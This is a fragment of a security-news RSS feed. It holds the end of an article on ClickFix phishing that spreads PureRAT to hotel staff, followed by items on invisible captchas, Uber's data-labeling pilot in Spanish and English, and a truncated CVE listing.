			</div><div class="et_pb_module et_pb_text et_pb_text_6  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_7  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h4><span><strong>Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.</strong></span></h4>
<p><a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" class="alignnone wp-image-276050 size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png" alt="" width="800" height="120" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw"></a></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_8  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="2550" data-end="2610"><strong>PureRAT (zgRAT) &amp; related malware — capabilities observed</strong></h2>
<p data-start="2612" data-end="2716">Analysts note the malware family and associated toolset provide a robust spying and takeover capability:</p>
<ul>
<li data-start="2720" data-end="2867"><strong data-start="2720" data-end="2737">RAT features:</strong> remote shell, file upload/download, screen capture, webcam/mic control, keylogging, process enumeration, and command execution.</li>
<li data-start="2870" data-end="2973"><strong data-start="2870" data-end="2895">Evasion / protection:</strong> samples observed protected with .NET Reactor to hinder reverse engineering.</li>
<li data-start="2976" data-end="3067"><strong data-start="2976" data-end="2992">Persistence:</strong> creation of Run registry keys and DLL side-loading to maintain presence.</li>
<li data-start="3070" data-end="3271"><strong data-start="3070" data-end="3102">Credential theft &amp; pivoting:</strong> operators deploy browser-stealer tools and loggers to extract session cookies, passwords, and admin credentials for Booking.com, Expedia, Airbnb and similar services.</li>
<li data-start="3274" data-end="3419"><strong data-start="3274" data-end="3294">Guest-targeting:</strong> attackers also use phishing to collect guest payment details via fake reservation verification pages sent by WhatsApp/email.</li>
</ul>
<p data-start="3421" data-end="3626">Researchers also reported the use of infostealers and RMM-like tools in related clusters (NetSupport, DanaBot variants, Lumma Stealer, StealC), indicating mixed objectives: account resale and direct fraud.</p>
<hr data-start="3628" data-end="3631">
<h2 data-start="3633" data-end="3697"><strong>Crime-as-a-service and the illicit economy behind the attacks</strong></h2>
<p data-start="3699" data-end="3785">Sekoia and other analysts highlight how the attack chain is supported by an ecosystem:</p>
<ul>
<li data-start="3789" data-end="3982"><strong data-start="3789" data-end="3831">Account resale &amp; log-checker services:</strong> Telegram bots and underground sellers offer Booking/Expedia logs and “checked” accounts for sale; services verify harvested credentials via proxies.</li>
<li data-start="3985" data-end="4155"><strong data-start="3985" data-end="4009">Role specialization:</strong> operators outsource distribution to “traffers” (malware distributors) and buy booking logs from market operators who claim manual verification.</li>
<li data-start="4158" data-end="4310"><strong data-start="4158" data-end="4182">Professionalization:</strong> turnkey services (log databases, checkers, malware builders) lower the barrier and scale these fraud operations across regions.</li>
</ul>
<p data-start="4312" data-end="4419">This commercialized model accelerates both the spread and sophistication of hospitality-targeted campaigns.</p>
<hr data-start="4421" data-end="4424">
<h2 data-start="4426" data-end="4452"><strong>Business &amp; guest impact</strong></h2>
<p data-start="4454" data-end="4505">Consequences for hospitality organisations include:</p>
<ul>
<li data-start="4509" data-end="4588"><strong data-start="4509" data-end="4541">Unauthorized booking changes</strong> and load juggling leading to financial loss.</li>
<li data-start="4591" data-end="4663"><strong data-start="4591" data-end="4619">Guest fraud / card theft</strong> from fake reservation verification pages.</li>
<li data-start="4666" data-end="4719"><strong data-start="4666" data-end="4689">Reputational damage</strong> and loss of customer trust.</li>
<li data-start="4722" data-end="4807"><strong data-start="4722" data-end="4757">Resale of valid extranet access</strong> or misuse to send follow-up phishing to guests.</li>
<li data-start="4810" data-end="4885"><strong data-start="4810" data-end="4833">Regulatory exposure</strong> if payment data or personal information is exposed.</li>
</ul>
<p data-start="4887" data-end="5106">Anecdotal victim reporting indicates attackers have successfully deleted booking emails, blocked notifications, and impersonated carriers during recovery calls — demonstrating operational knowledge of booking workflows.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_9 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/articles/can-outsourcing-actually-save-you-money/" target="_blank" rel="noopener noreferrer">Can Outsourcing Actually Save You Money?<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_10  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News Adsense Adcode Horizontal --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_11 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/tools/evilwaf-web-application-firewall-bypass-toolkit/" target="_blank" rel="noopener">Offensive Security Tool: EvilWAF – Web Application Firewall Bypass Toolkit</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_12  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<h2 data-start="5113" data-end="5154"><strong>Defensive recommendations</strong></h2>
<p data-start="5156" data-end="5231">To reduce risk and detect these campaigns, organisations should prioritize:</p>
<ul>
<li data-start="5235" data-end="5393"><strong data-start="5235" data-end="5264">Email &amp; link protections:</strong> block or sandbox links to unknown landing pages; block .exe/.msi attachments and flag pages that auto-copy clipboard contents.</li>
<li data-start="5396" data-end="5565"><strong data-start="5396" data-end="5434">Stop execution from the clipboard:</strong> educate staff not to paste/run commands copied from websites; disable unnecessary script execution policies for non-admin users.</li>
<li data-start="5568" data-end="5720"><strong data-start="5568" data-end="5598">Restrict RMM/remote tools:</strong> allow only pre-approved remote-support tools and use application allowlisting and EDR to block unauthorized installers.</li>
<li data-start="5723" data-end="5922"><strong data-start="5723" data-end="5760">Harden booking extranet accounts:</strong> enforce strong, unique passwords, enforce MFA on Booking/Expedia extranet accounts, and monitor for anomalous logins (geographic anomalies, rapid session use).</li>
<li data-start="5925" data-end="6073"><strong data-start="5925" data-end="5962">Credential monitoring &amp; rotation:</strong> treat exposed accounts as high-risk; rotate credentials promptly and audit sessions on compromise suspicion.</li>
<li data-start="6076" data-end="6215"><strong data-start="6076" data-end="6099">Endpoint detection:</strong> tune EDR to flag DLL side-loading, Run-key persistence changes, and new processes spawned by explorer/PowerShell.</li>
<li data-start="6218" data-end="6380"><strong data-start="6218" data-end="6239">Guest protection:</strong> avoid asking customers to enter card details via emailed links; use secure payment flows and crisis-response templates for communications.</li>
<li data-start="6383" data-end="6537"><strong data-start="6383" data-end="6410">Threat intel &amp; sharing:</strong> share IOC feeds with sector peers and ISACs; monitor underground markets for leaked extranet accounts tied to your properties.</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_13 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/news/freight-brokers-hit-by-rmm-based-cyber-attacks-aimed-at-physical-cargo-theft/" target="_blank" rel="noopener noreferrer">Freight Brokers Hit by RMM-Based Cyber Attacks Aimed at Physical Cargo Theft</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_14  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote><p><em>Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? </em><em>If you want to express your idea in an article contact us here for a quote: <strong>info@blackhatethicalhacking.com</strong></em></p></blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_15  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><em>Source: thehackernews.com, blog.sekoia.io</em></strong></p>
<p><a href="https://thehackernews.com/2025/11/large-scale-clickfix-phishing-attacks.html" target="_blank" rel="noopener"><strong>Source Link</strong></a></p></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_1 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_image et_pb_image_1 store-img">
				
				
				
				
				<a href="https://store.blackhatethicalhacking.com/" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="1142" height="500" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png" alt="Merch" title="Store" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png 1142w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-980x429.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-480x210.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1142px, 100vw" class="wp-image-271829"></span></a>
			</div><div class=" et_pb_logo_slider  et_pb_logo_slider_0 ">
                
            </div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_1    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_0 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent News</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/freight-brokers-hit-by-rmm-based-cyber-attacks-aimed-at-physical-cargo-theft/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/11/877x440-Images-for-the-News-posts-28-300x150.png" alt="Freight Brokers Hit by RMM-Based Cyber Attacks Aimed at Physical Cargo Theft" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/freight-brokers-hit-by-rmm-based-cyber-attacks-aimed-at-physical-cargo-theft/" target="_self">Freight Brokers Hit by RMM-Based Cyber Attacks Aimed at Physical Cargo Theft</a></h3><time class="rpwe-time published" datetime="2025-11-04T11:45:21+02:00">November 4, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/adaptixc2-open-source-c2-tool-gains-traction-with-ransomware-linked-actors/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-36-300x150.png" alt="AdaptixC2: Open-Source C2 Tool Gains Traction with Ransomware-Linked Actors" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/adaptixc2-open-source-c2-tool-gains-traction-with-ransomware-linked-actors/" target="_self">AdaptixC2: Open-Source C2 Tool Gains Traction with Ransomware-Linked Actors</a></h3><time class="rpwe-time published" datetime="2025-10-31T12:10:45+02:00">October 31, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/nearly-76000-watchguard-firebox-appliances-exposed-critical-ikev2-rce-cve-2025-9242/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-35-300x150.png" alt="Nearly 76,000 WatchGuard Firebox Appliances Exposed — Critical IKEv2 RCE (CVE-2025-9242)" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/nearly-76000-watchguard-firebox-appliances-exposed-critical-ikev2-rce-cve-2025-9242/" target="_self">Nearly 76,000 WatchGuard Firebox Appliances Exposed — Critical IKEv2 RCE (CVE-2025-9242)</a></h3><time class="rpwe-time published" datetime="2025-10-21T11:58:34+02:00">October 21, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/linkpro-rootkit-new-ebpf-backed-gnu-linux-backdoor-found-in-compromised-aws-environments/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-34-300x150.png" alt="LinkPro Rootkit: New eBPF-Backed GNU/Linux Backdoor Found in Compromised AWS Environments" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/linkpro-rootkit-new-ebpf-backed-gnu-linux-backdoor-found-in-compromised-aws-environments/" target="_self">LinkPro Rootkit: New eBPF-Backed GNU/Linux Backdoor Found in Compromised AWS Environments</a></h3><time class="rpwe-time published" datetime="2025-10-17T10:10:58+02:00">October 17, 2025</time><div class="rpwe-summary"></div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="et_pb_widget widget_block"><h3>EXPLORE OUR STORE</h3></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="233" height="300" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Tshirt-233x300.png" class="image wp-image-280999  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="300" height="280" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/RedTeamers-e1725807706904-300x280.png" class="image wp-image-281001  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="711" height="1024" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Hoodie-711x1024.png" class="image wp-image-281002  attachment-large size-large" alt=""></a></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget"> <!-- News Adsense Adcode --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div></div>
			</div><div class="et_pb_module et_pb_sidebar_1 news-sidebar2 et_animated et_pb_widget_area clearfix et_pb_widget_area_left  et_pb_text_align_justified et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p>
</div><div class="et_pb_widget widget_block"><hr>
<a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://discord.gg/EYMqveWXkv"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/10/Discord.png"></a>
<h3>Join our Community</h3></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/news/hotel-managers-targeted-by-clickfix-phishing-purerat-used-to-harvest-booking-com-credentials/">Hotel Managers Targeted by ClickFix Phishing – PureRAT Used to Harvest Booking.com Credentials</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Curious Case of the Bizarre, Disappearing Captcha]]></title>
<description><![CDATA[Captchas have largely vanished from the web in 2025, replaced by invisible tracking systems that analyze user behavior rather than asking people to decipher distorted text or identify traffic lights in image grids. Google launched reCaptcha v3 in 2018 to generate risk scores based on behavioral s...]]></description>
<link>https://tsecurity.de/de/3077845/it-security-nachrichten/the-curious-case-of-the-bizarre-disappearing-captcha/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3077845/it-security-nachrichten/the-curious-case-of-the-bizarre-disappearing-captcha/</guid>
<pubDate>Mon, 03 Nov 2025 20:48:35 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Captchas have largely vanished from the web in 2025, replaced by invisible tracking systems that analyze user behavior rather than asking people to decipher distorted text or identify traffic lights in image grids. Google launched reCaptcha v3 in 2018 to generate risk scores based on behavioral signals during site interactions, making bot-blocking technology "completely invisible" for most users, according to Tim Knudsen, a director of product management at Google Cloud. 

Cloudflare followed in 2022 by releasing Turnstile, another invisible alternative that sometimes appears as a simple checkbox but actually gathers data from devices and software to determine if users are human. Both companies distribute their security tools for free to collect training data, and Cloudflare now sees 20% of all HTTP requests across the internet. 

The rare challenges that do surface have become increasingly bizarre, ranging from requests to identify dogs and ducks wearing various hats to sliding a jockstrap across a screen to find matching underwear on hookup sites.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=The+Curious+Case+of+the+Bizarre%2C+Disappearing+Captcha%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F25%2F11%2F03%2F1916215%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F25%2F11%2F03%2F1916215%2Fthe-curious-case-of-the-bizarre-disappearing-captcha%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/25/11/03/1916215/the-curious-case-of-the-bizarre-disappearing-captcha?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Uber lanza un programa piloto para que sus conductores entrenen a la IA]]></title>
<description><![CDATA[Tras su entrada en el ámbito del etiquetado de datos el año pasado con el lanzamiento de una nueva división, Scaled Solutions, Uber presentó este jueves un proyecto piloto en el mercado estadounidense en el que sus conductores, al igual que sus homólogos de la India, anotarán datos para su uso en...]]></description>
<link>https://tsecurity.de/de/3045925/it-security-nachrichten/uber-lanza-un-programa-piloto-para-que-sus-conductores-entrenen-a-la-ia/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3045925/it-security-nachrichten/uber-lanza-un-programa-piloto-para-que-sus-conductores-entrenen-a-la-ia/</guid>
<pubDate>Fri, 17 Oct 2025 10:04:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Tras su <strong>entrada en el ámbito del etiquetado de datos</strong> el año pasado con el lanzamiento de una nueva división, Scaled Solutions, <strong>Uber presentó este jueves un proyecto piloto en el mercado estadounidense en el que sus conductores, al igual que sus homólogos de la India, anotarán datos para su uso en el entrenamiento de la inteligencia artificial</strong>.</p>



<p><strong>Megha Yethadka, directora global de la división</strong>, ahora rebautizada como <strong>Uber AI Solutions</strong>, dijo que el programa piloto en la India, lanzado el mes pasado, permite a los conductores de 12 ciudades indias utilizar su tiempo de inactividad para completar tareas digitales, que abarcan desde la clasificación de imágenes y el análisis de textos hasta la transcripción de audio y la digitalización de recibos.</p>



<p>La medida llega después del <strong>anuncio realizado el pasado junio de expandir la plataforma de IA de Uber</strong>, que la empresa describió como un conjunto de ofertas que incluyen “soluciones personalizadas para crear modelos y agentes de IA más inteligentes, redes globales de tareas digitales y herramientas para ayudar a las empresas a crear y probar modelos de IA de forma más eficiente”. Según un comunicado, Uber AI Solutions “ofrece las herramientas y los datos necesarios para ayudar a entrenar a agentes de IA inteligentes, incluyendo flujos de tareas realistas, anotaciones de alta calidad, simulaciones y soporte multilingüe, lo que ayuda a los agentes de IA a comprender y navegar por los procesos empresariales del mundo real”.</p>



<p><strong>El programa piloto estadounidense, anunciado en un evento (Only on Uber) de la organización, contará, según el <em><a href="https://www.uber.com/blog/digital-tasks/" target="_blank" rel="nofollow">blog </a></em>de la empresa, con “un grupo selecto de conductores y mensajeros que realizarán tareas digitales, como grabarse hablando en el idioma con el que se sientan más cómodos, enviar documentos escritos en diferentes idiomas y subir imágenes</strong>”.</p>



<p><strong>Shashi Bellamkonda, director principal de investigación de Info-Tech Research Group, describe el anuncio como “una medida inteligente y estratégica de Uber</strong>”. Según él, la empresa ya cuenta con “una amplia audiencia global de conductores y repartidores. Es de suponer que dispondrán de algo de tiempo libre entre un viaje y otro para interactuar y realizar pequeñas tareas digitales que ayuden a entrenar los modelos de IA”.</p>



<p>“<strong>Uber es, ante todo, una empresa de datos y logística</strong>, y esta medida aprovecha esas fortalezas de una manera que podría generar datos de entrenamiento valiosos y diversos”, observa. “Esto me recuerda cómo CAPTCHA/reCAPTCHA sigue utilizándose para entrenar modelos de IA. Uber ahorra dinero al hacerlo ‘internamente’ y también podría ofrecer los datos recabados de alguna forma a otras empresas”.</p>



<p>Señaló que la medida también “<strong>introduce un nuevo actor en el mercado del etiquetado de datos con intervención humana</strong>, que ha estado dominado por unos pocos proveedores especializados. Con la escala y el alcance de Uber, podría aumentar la competencia y aportar más flexibilidad y presión sobre los precios a un mercado que sigue siendo demasiado costoso y que requiere muchos recursos para muchas organizaciones. También muestra cómo la preparación y el etiquetado de datos se están convirtiendo en productos básicos, y por qué los directores de informática deberían empezar a considerar estas funciones como categorías de adquisición estratégicas en lugar de simples tareas técnicas especializadas”.</p>



<p>Los directores de TI, según Bellamkonda, también “luchan por alinear sus inversiones en IA con un valor empresarial claro. <strong>Hay dos lecciones que aprender aquí. En primer lugar, explorar si los datos propios de las operaciones diarias podrían utilizarse en una iniciativa de etiquetado de datos propia, aunque solo sea para casos de uso limitados</strong>”. La segunda lección, según él, es que “la anotación de datos de Uber podría ofrecer una <strong>nueva oportunidad y ayudar a los CIO que desean un conjunto de datos globalmente diverso</strong>. Cuando esté disponible, podría valer la pena evaluar el ahorro potencial de costes que supone el uso de este nuevo conjunto de datos y llevar a cabo un pequeño programa piloto para compararlo con los proveedores existentes”.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Uber wants to become the ‘Uber’ of data labeling]]></title>
<description><![CDATA[Following its entrance into the data labeling space last year with the launch of a new division, Scaled Solutions, Uber on Thursday introduced a pilot project in the US market that will see its drivers, like their counterparts in India, annotate data for use in AI training.



Megha Yethadka, glo...]]></description>
<link>https://tsecurity.de/de/3045457/it-security-nachrichten/uber-wants-to-become-the-uber-of-data-labeling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3045457/it-security-nachrichten/uber-wants-to-become-the-uber-of-data-labeling/</guid>
<pubDate>Fri, 17 Oct 2025 04:35:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Following its entrance into the data labeling space last year with the <a href="https://www.cio.com/article/3614626/uber-branches-out-into-ai-data-labeling.html" target="_blank">launch</a> of a new division, Scaled Solutions, Uber on Thursday introduced a pilot project in the US market that will see its drivers, like their counterparts in India, annotate data for use in AI training.</p>



<p>Megha Yethadka, global head of the division now renamed Uber AI Solutions, said the <a href="https://www.computerworld.com/article/4052881/uber-turns-drivers-into-ai-data-labelers-in-india-pilot.html" target="_blank">pilot program in India</a>, launched last month, enables drivers across 12 Indian cities to use their downtime to complete digital tasks, encompassing everything from image classification and text analysis to audio transcription and receipt digitization.</p>



<p>The move follows the June <a href="https://investor.uber.com/news-events/news/press-release-details/2025/Uber-Expands-AI-Data-Platform-to-Power-Next-Gen-Enterprise-and-AI-Lab-Needs/default.aspx" target="_blank" rel="nofollow">announcement</a> of an expansion of Uber’s AI platform, which the company described as a set of offerings that include “customized solutions for building smarter AI models and agents, global digital task networks, and tools to help companies build and test AI models more efficiently.”</p>



<p>Uber AI Solutions, a release stated, “is offering the tools and data to help train smart AI agents, including realistic task flows, high-quality annotations, simulations, and multilingual support, helping AI agents understand and navigate real-world business processes.”</p>



<p>The US pilot, which was announced at the organization’s <em>Only on Uber</em> event, will, according to a company blog, involve a “select group of drivers and couriers completing <a href="https://www.uber.com/blog/digital-tasks/" target="_blank" rel="nofollow">digital tasks</a> such as recording themselves speaking in the language they are most comfortable with, submitting documents written in different languages, and the uploading of images.”</p>



<p><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="nofollow">Shashi Bellamkonda</a>, a principal research director at Info-Tech Research Group, described the announcement as a “smart and strategic move from Uber.”</p>



<p>The company, he said, already has a “vast, global audience of drivers and delivery workers. One would think they would have some time alone between rides to interact and take on small digital tasks that help train AI models.”</p>



<p>“Uber is a data and logistics company first, and this move uses those strengths in a way that could generate valuable and diverse training data,” he observed. “This reminds me of how CAPTCHA/reCAPTCHA is still being used to train AI models. Uber saves money by doing this ‘internally’ and could also offer the annotated data in some form to other companies.”</p>



<p>He pointed out that the move also “introduces a new player into the human-in-the-loop data-labeling market, which has been dominated by a few specialty vendors. With Uber’s scale and reach, it could increase competition and bring more flexibility and pricing pressure to a market that is still too costly and resource-intensive for many organizations. It also shows how data preparation and labeling are becoming more commoditized, and why CIOs should begin viewing these functions as strategic procurement categories rather than just niche technical tasks.”</p>



<p>CIOs, said Bellamkonda, are also “struggling to align their AI investments with clear business value. There are two lessons here. First, explore whether your own data from everyday operations could be used in a proprietary data-labeling initiative, even if only for limited use cases.”</p>



<p>The second lesson, he said, is, “Uber’s data annotation could offer a new opportunity and help CIOs who want a globally diverse dataset. When it becomes available, it might be worth assessing the potential cost savings of using this new dataset and running a small pilot to evaluate it against existing providers.”</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-0704 | JoeyBling bootplus up to 247d5f6c209be1a5cf10cd0fa18e1d8cc63cf55d QrCodeController.java qrCode w/h resource consumption]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in JoeyBling bootplus up to 247d5f6c209be1a5cf10cd0fa18e1d8cc63cf55d. This issue affects the function qrCode of the file src/main/java/io/github/controller/QrCodeController.java. The manipulation of the argument w/h leads to res...]]></description>
<link>https://tsecurity.de/de/3033446/sicherheitsluecken/cve-2025-0704-joeybling-bootplus-up-to-247d5f6c209be1a5cf10cd0fa18e1d8cc63cf55d-qrcodecontrollerjava-qrcode-wh-resource-consumption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3033446/sicherheitsluecken/cve-2025-0704-joeybling-bootplus-up-to-247d5f6c209be1a5cf10cd0fa18e1d8cc63cf55d-qrcodecontrollerjava-qrcode-wh-resource-consumption/</guid>
<pubDate>Fri, 10 Oct 2025 22:22:36 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
